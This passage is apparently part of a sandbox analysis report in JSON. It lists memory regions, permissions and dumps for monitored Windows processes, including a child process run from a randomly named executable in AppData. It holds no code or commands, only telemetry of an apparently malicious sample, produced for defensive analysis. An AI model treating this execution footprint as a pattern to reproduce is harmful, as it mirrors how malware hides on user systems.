1736703, "entry_point": 0, "filename": null, "id": "region_1290", "name": "pagefile_0x00000000000e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 917504, "timestamp": "00:01:08.292", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1971060736, "type": "region", "version": 1 }, "end_va": 1971896319, "entry_point": 1971066507, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1291", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1971060736, "timestamp": "00:01:08.292", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 2000683008, "type": "region", "version": 1 }, "end_va": 2000809983, "entry_point": 2000687957, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1292", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 2000683008, "timestamp": "00:01:08.292", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001293-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_205", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1293", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:08.415", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001294-addr_0x00000000000b0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_206", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 724991, "entry_point": 0, "filename": null, "id": "region_1294", "name": "private_0x00000000000b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 720896, "timestamp": "00:01:08.416", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 815103, "entry_point": 0, "filename": null, "id": "region_1295", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:01:08.416", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 1777663, "entry_point": 0, "filename": null, "id": "region_1296", "name": "pagefile_0x00000000001b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1769472, "timestamp": "00:01:08.416", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 4915200, "type": "region", "version": 1 }, "end_va": 5967871, "entry_point": 0, "filename": null, "id": "region_1297", "name": "pagefile_0x00000000004b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4915200, "timestamp": "00:01:08.416", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 6029312, "type": "region", "version": 1 }, "end_va": 10170367, "entry_point": 0, "filename": null, "id": "region_1298", "name": "pagefile_0x00000000005c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6029312, "timestamp": "00:01:08.416", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001299-addr_0x0000000000b90000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_207", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 12124160, "type": "region", "version": 1 }, "end_va": 12189695, "entry_point": 0, "filename": null, "id": "region_1299", "name": "private_0x0000000000b90000", "norm_filename": null, "region_type": "private_memory", "start_va": 12124160, "timestamp": "00:01:08.416", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 12976128, "type": "region", "version": 1 }, "end_va": 25559039, "entry_point": 0, "filename": null, "id": "region_1300", "name": "pagefile_0x0000000000c60000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 12976128, "timestamp": "00:01:08.416", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 1839103, "entry_point": 0, "filename": null, "id": "region_1301", "name": "pagefile_0x00000000001c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1835008, "timestamp": "00:01:08.417", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 25559040, "type": "region", "version": 1 }, "end_va": 28504063, "entry_point": 25559040, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1302", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 25559040, "timestamp": "00:01:08.418", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 1908735, "entry_point": 0, "filename": null, "id": "region_1303", "name": "pagefile_0x00000000001d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1900544, "timestamp": "00:01:08.421", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1948975104, "type": "region", "version": 1 }, "end_va": 1950670847, "entry_point": 1949165237, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_1304", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1948975104, "timestamp": "00:01:08.421", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 1970175, "entry_point": 1966080, "filename": "\\Windows\\WindowsShell.Manifest", "id": "region_1305", "name": "windowsshell.manifest", "norm_filename": "c:\\windows\\windowsshell.manifest", "region_type": "memory_mapped_file", "start_va": 1966080, "timestamp": "00:01:08.423", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 3080192, "type": "region", "version": 1 }, "end_va": 3088383, "entry_point": 0, "filename": null, "id": "region_1306", "name": "pagefile_0x00000000002f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3080192, "timestamp": "00:01:08.423", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001307-addr_0x0000000001bd0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_208", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 29163520, "type": "region", "version": 1 }, "end_va": 30212095, "entry_point": 0, "filename": null, "id": "region_1307", "name": "private_0x0000000001bd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 29163520, "timestamp": "00:01:08.428", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001308-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_209", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_1308", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:01:08.428", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 1970175, "entry_point": 0, "filename": null, "id": "region_1309", "name": "pagefile_0x00000000001e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1966080, "timestamp": "00:01:08.430", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 376832, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3522559, "entry_point": 3290553, "filename": "\\Windows\\System32\\rpcss.dll", "id": "region_1310", "name": "rpcss.dll", "norm_filename": "c:\\windows\\system32\\rpcss.dll", "region_type": "memory_mapped_file", "start_va": 3145728, "timestamp": "00:01:08.436", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1966342144, "type": "region", "version": 1 }, "end_va": 1966391295, "entry_point": 1966346465, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_1312", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1966342144, "timestamp": "00:01:08.440", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 1939668992, "type": "region", "version": 1 }, "end_va": 1939931135, "entry_point": 1939710685, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_1313", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1939668992, "timestamp": "00:01:08.442", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001314-addr_0x00000000009c0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_210", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 10223616, "type": "region", "version": 1 }, "end_va": 11272191, "entry_point": 0, "filename": null, "id": "region_1314", "name": "private_0x00000000009c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 10223616, "timestamp": "00:01:08.444", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001315-addr_0x0000000001d50000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_211", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 30736384, "type": "region", "version": 1 }, "end_va": 31784959, "entry_point": 0, "filename": null, "id": "region_1315", "name": "private_0x0000000001d50000", "norm_filename": null, "region_type": "private_memory", "start_va": 30736384, "timestamp": "00:01:08.451", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 31784960, "type": "region", "version": 1 }, "end_va": 32698367, "entry_point": 0, "filename": null, "id": "region_1316", "name": "pagefile_0x0000000001e50000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 31784960, "timestamp": "00:01:08.451", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001317-addr_0x000000007ffdd000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_212", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147340288, "type": "region", "version": 1 }, "end_va": 2147344383, "entry_point": 0, "filename": null, "id": "region_1317", "name": "private_0x000000007ffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147340288, "timestamp": "00:01:08.451", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001318-addr_0x0000000000300000-size_0x0000000000024000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_213", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 147456, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3293183, "entry_point": 0, "filename": null, "id": "region_1318", "name": "private_0x0000000000300000", "norm_filename": null, "region_type": "private_memory", "start_va": 3145728, "timestamp": "00:01:08.459", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1028096, "start_va": 1935540224, "type": "region", "version": 1 }, "end_va": 1936568319, "entry_point": 1935611873, "filename": "\\Windows\\System32\\WindowsCodecs.dll", "id": "region_1319", "name": "windowscodecs.dll", "norm_filename": "c:\\windows\\system32\\windowscodecs.dll", "region_type": "memory_mapped_file", "start_va": 1935540224, "timestamp": "00:01:08.459", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001320-addr_0x0000000000330000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_214", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 3342336, "type": "region", "version": 1 }, "end_va": 3346431, "entry_point": 0, "filename": null, "id": "region_1320", "name": "private_0x0000000000330000", "norm_filename": null, "region_type": "private_memory", "start_va": 3342336, "timestamp": "00:01:08.465", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001321-addr_0x0000000000340000-size_0x0000000000009000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_215", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 36864, "start_va": 3407872, "type": "region", "version": 1 }, "end_va": 3444735, "entry_point": 0, "filename": null, "id": "region_1321", "name": "private_0x0000000000340000", "norm_filename": null, "region_type": "private_memory", "start_va": 3407872, "timestamp": "00:01:08.465", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001322-addr_0x0000000000350000-size_0x0000000000024000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_216", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 147456, "start_va": 3473408, "type": "region", "version": 1 }, "end_va": 3620863, "entry_point": 0, "filename": null, "id": "region_1322", "name": "private_0x0000000000350000", "norm_filename": null, "region_type": "private_memory", "start_va": 3473408, "timestamp": "00:01:08.465", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001323-addr_0x0000000000380000-size_0x0000000000009000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_217", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 36864, "start_va": 3670016, "type": "region", "version": 1 }, "end_va": 3706879, "entry_point": 0, "filename": null, "id": "region_1323", "name": "private_0x0000000000380000", "norm_filename": null, "region_type": "private_memory", "start_va": 3670016, "timestamp": "00:01:08.466", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001324-addr_0x0000000001f30000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_218", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 32702464, "type": "region", "version": 1 }, "end_va": 33751039, "entry_point": 0, "filename": null, "id": "region_1324", "name": "private_0x0000000001f30000", "norm_filename": null, "region_type": "private_memory", "start_va": 32702464, "timestamp": "00:01:08.466", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 311296, "start_va": 1901133824, "type": "region", "version": 1 }, "end_va": 1901445119, "entry_point": 1901145108, "filename": "\\Windows\\System32\\apphelp.dll", "id": "region_1325", "name": "apphelp.dll", "norm_filename": "c:\\windows\\system32\\apphelp.dll", "region_type": "memory_mapped_file", "start_va": 1901133824, "timestamp": "00:01:08.466", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20275200, "start_va": 1649016832, "type": "region", "version": 1 }, "end_va": 1669292031, "entry_point": 1649016832, "filename": "\\Windows\\System32\\imageres.dll", "id": "region_1326", "name": "imageres.dll", "norm_filename": "c:\\windows\\system32\\imageres.dll", "region_type": "memory_mapped_file", "start_va": 1649016832, "timestamp": "00:01:08.471", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001327-addr_0x00000000009c0000-size_0x0000000000048000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_219", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 294912, "start_va": 10223616, "type": "region", "version": 1 }, "end_va": 10518527, "entry_point": 0, "filename": null, "id": "region_1327", "name": "private_0x00000000009c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 10223616, "timestamp": "00:01:08.483", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001328-addr_0x0000000000a80000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_220", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 11010048, "type": "region", "version": 1 }, "end_va": 11272191, "entry_point": 0, "filename": null, "id": "region_1328", "name": "private_0x0000000000a80000", "norm_filename": null, "region_type": "private_memory", "start_va": 11010048, "timestamp": "00:01:08.483", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20275200, "start_va": 1628700672, "type": "region", "version": 1 }, "end_va": 1648975871, "entry_point": 1628700672, "filename": "\\Windows\\System32\\imageres.dll", "id": "region_1329", "name": "imageres.dll", "norm_filename": "c:\\windows\\system32\\imageres.dll", "region_type": "memory_mapped_file", "start_va": 1628700672, "timestamp": "00:01:08.484", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001332-addr_0x0000000000300000-size_0x0000000000012000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_221", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 73728, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3219455, "entry_point": 0, "filename": null, "id": "region_1332", "name": "private_0x0000000000300000", "norm_filename": null, "region_type": "private_memory", "start_va": 3145728, "timestamp": "00:01:08.495", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001336-addr_0x0000000000a10000-size_0x0000000000048000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_222", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 294912, "start_va": 10551296, "type": "region", "version": 1 }, "end_va": 10846207, "entry_point": 0, "filename": null, "id": "region_1336", "name": "private_0x0000000000a10000", "norm_filename": null, "region_type": "private_memory", "start_va": 10551296, "timestamp": "00:01:08.506", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001340-addr_0x0000000000340000-size_0x0000000000012000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_223", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 73728, "start_va": 3407872, "type": "region", "version": 1 }, "end_va": 3481599, "entry_point": 0, "filename": null, "id": "region_1340", "name": "private_0x0000000000340000", "norm_filename": null, "region_type": "private_memory", "start_va": 3407872, "timestamp": "00:01:08.517", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001344-addr_0x0000000000360000-size_0x0000000000012000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_224", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 73728, "start_va": 3538944, "type": "region", "version": 1 }, "end_va": 3612671, "entry_point": 0, "filename": null, "id": "region_1344", "name": "private_0x0000000000360000", "norm_filename": null, "region_type": "private_memory", "start_va": 3538944, "timestamp": "00:01:08.538", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001345-addr_0x0000000000320000-size_0x000000000000d000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_225", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 53248, "start_va": 3276800, "type": "region", "version": 1 }, "end_va": 3330047, "entry_point": 0, "filename": null, "id": "region_1345", "name": "private_0x0000000000320000", "norm_filename": null, "region_type": "private_memory", "start_va": 3276800, "timestamp": "00:01:08.542", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 110592, "start_va": 1966211072, "type": "region", "version": 1 }, "end_va": 1966321663, "entry_point": 1966248889, "filename": "\\Windows\\System32\\sspicli.dll", "id": "region_1346", "name": "sspicli.dll", "norm_filename": "c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1966211072, "timestamp": "00:01:08.545", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001347-addr_0x0000000000380000-size_0x000000000000d000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_226", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 53248, "start_va": 3670016, "type": "region", "version": 1 }, "end_va": 3723263, "entry_point": 0, "filename": null, "id": "region_1347", "name": "private_0x0000000000380000", "norm_filename": null, "region_type": "private_memory", "start_va": 3670016, "timestamp": "00:01:08.549", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\ekgEobhbhTp7rXMh.exe\"", "filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\ekgeobhbhtp7rxmh.exe", "id": "proc_9", "image_name": "ekgeobhbhtp7rxmh.exe", "monitor_reason": "child_process", "monitored_id": 9, "origin_monitor_id": 8, "ref_parent_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000009-region_00001348-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_227", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1348", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:10.308", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_1349", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:10.308", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001350-addr_0x00000000001f0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_228", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 3080191, "entry_point": 0, "filename": null, "id": "region_1350", "name": "private_0x00000000001f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2031616, "timestamp": "00:01:10.308", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001351-addr_0x0000000000c40000-size_0x000000000001b000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_229", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 110592, "start_va": 12845056, "type": "region", "version": 1 }, "end_va": 12955647, "entry_point": 12852624, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\ekgEobhbhTp7rXMh.exe", "id": "region_1351", "name": "ekgeobhbhtp7rxmh.exe", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\ekgeobhbhtp7rxmh.exe", "region_type": "memory_mapped_file", "start_va": 12845056, "timestamp": "00:01:10.308", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1999241216, "type": "region", "version": 1 }, "end_va": 2000535551, "entry_point": 1999241216, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1352", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999241216, "timestamp": "00:01:10.309", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2001600512, "type": "region", "version": 1 }, "end_va": 2001604607, "entry_point": 2001600512, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1353", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2001600512, "timestamp": "00:01:10.309", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_1354", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:01:10.311", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001355-addr_0x000000007ffd6000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_230", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 